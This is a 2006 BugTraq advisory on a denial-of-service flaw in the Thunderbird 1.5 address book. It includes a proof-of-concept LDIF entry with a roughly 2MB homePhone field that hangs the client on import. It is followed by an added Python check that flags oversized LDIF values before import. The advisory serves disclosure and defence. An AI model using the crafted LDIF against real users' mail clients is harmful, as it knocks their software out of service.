BugTraq
Mozilla Thunderbird 1.5 Address Book DoS
Feb 21 2006 04:11PM
Javor Ninov (drfrancky securax org)
Affected: Mozilla Thunderbird 1.5 /possibly other versions/
Mozilla Thunderbird 1.5 address book allows fields of unlimited size in
the address book, which leads to a DoS if you import such an LDIF file.
PoC: create a file.ldif, insert the following, then import it into the address book:
------- start --------
dn: cn=Test POC by DrFrancky (at) securax (dot) org,mail=drfrancky (at) securax (dot) org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky (at) securax (dot) org
cn: POC by DrFrancky (at) securax (dot) org
mozillaNickname: DrFrancky
mail: drfrancky (at) securax (dot) org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------
Credits:
DrFrancky
drfrancky (at) securax (dot) org
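A defensive pre-import check for the oversized-field condition described in the post, as an added example that is not part of the original post or Mozilla's code: it measures every LDIF attribute value, including folded and base64 values, against a length limit. The function name, the 1024-character limit and the sample data are assumptions.

```python
import io

MAX_VALUE_LEN = 1024  # assumed import policy, not a Thunderbird setting


def oversized_ldif_values(stream, limit=MAX_VALUE_LEN):
    """Return (entry_no, attribute, length) for each value longer than limit."""
    findings = []
    entry_no, in_entry = 0, False
    attr, length, b64 = None, 0, False

    def flush():
        # base64 values ("attr:: ...") decode to roughly 3/4 of their text
        size = length * 3 // 4 if b64 else length
        if attr is not None and size > limit:
            findings.append((entry_no, attr, size))

    for raw in stream:
        line = raw.rstrip("\r\n")
        if line.startswith(" ") and attr is not None:
            length += len(line) - 1              # folded continuation line
            continue
        flush()
        attr, length, b64 = None, 0, False
        if not line:                             # blank line ends an entry
            in_entry = False
            continue
        if line.startswith("#") or ":" not in line:
            continue                             # comment or malformed line
        if not in_entry:
            entry_no, in_entry = entry_no + 1, True
        attr, _, rest = line.partition(":")
        b64 = rest.startswith(":")
        length = len(rest[1:].lstrip(" ") if b64 else rest.lstrip(" "))
    flush()
    return findings


# Constructed sample: entry 1 has one long line, entry 2 a long folded value.
SAMPLE_LDIF = "\n".join([
    "dn: cn=Test,mail=test@example.invalid",
    "objectclass: person",
    "homePhone: " + "a" * 5000,
    "",
    "dn: cn=Folded,mail=folded@example.invalid",
    "description: " + "b" * 70,
    *([" " + "b" * 75] * 20),
    "",
])
```

Pass any text stream, for example `oversized_ldif_values(io.StringIO(SAMPLE_LDIF))`, and reject the file before import if the returned list is not empty.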